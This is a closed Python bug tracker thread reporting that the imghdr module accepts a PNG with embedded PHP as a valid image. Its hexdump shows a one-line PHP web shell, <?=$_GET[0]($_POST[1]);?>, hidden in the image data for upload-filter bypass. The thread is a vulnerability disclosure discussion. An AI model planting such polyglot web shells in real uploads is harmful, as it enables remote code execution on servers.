Issue 26337: Bypass imghdr module determines the type of image (original) (raw)

Created on 2016-02-11 05:55 by Ramin Farajpour Cami, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Messages (5)
msg260074 - (view)	Author: Ramin Farajpour Cami (Ramin Farajpour Cami)	Date: 2016-02-11 05:55
import imghdr imghdr.what('phppng.png') output : 'png' if you set javascript script in file .png or .jpg , output : ValueError: invalid \x escape Hexdump: root@Ramin:~# hexdump -C phppng.png 00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR	00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed	... ... ........	00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e	.....pHYs.......	00000030 c4 01 95 2b 0e 1b 00 00 00 60 49 44 41 54 48 89	...+.....`IDATH.	00000040 63 5c 3c 3f 3d 24 5f 47 45 54 5b 30 5d 28 24 5f	c\<?=$_GET[0]($_	### Here PHP Code 00000050 50 4f 53 54 5b 31 5d 29 3b 3f 3e 58 80 81 81 c1	POST[1]);?>X....
msg260080 - (view)	Author: Steven D'Aprano (steven.daprano) *	Date: 2016-02-11 09:53
I'm sorry, I don't understand what you think is the bug here. It looks like you are passing a corrupted file which has a PNG extension but is not actually a PNG file (it contains PHP code). What do you expect should happen?
msg260082 - (view)	Author: Ramin Farajpour Cami (Ramin Farajpour Cami)	Date: 2016-02-11 10:21
images can be served with a content type of text/html,(which means we can certainly inject HTML).
msg260091 - (view)	Author: Ramin Farajpour Cami (Ramin Farajpour Cami)	Date: 2016-02-11 11:33
In normal if you choose a image and open image with editor set codes to image you get error , but I able to bypass image for upload if I use module imghdr for check valid image , booom upload image with malicious code ,
msg415047 - (view)	Author: Irit Katriel (iritkatriel) *	Date: 2022-03-13 17:16
imghdr is deprecated as per PEP 594, so there won't be further enhancements to it.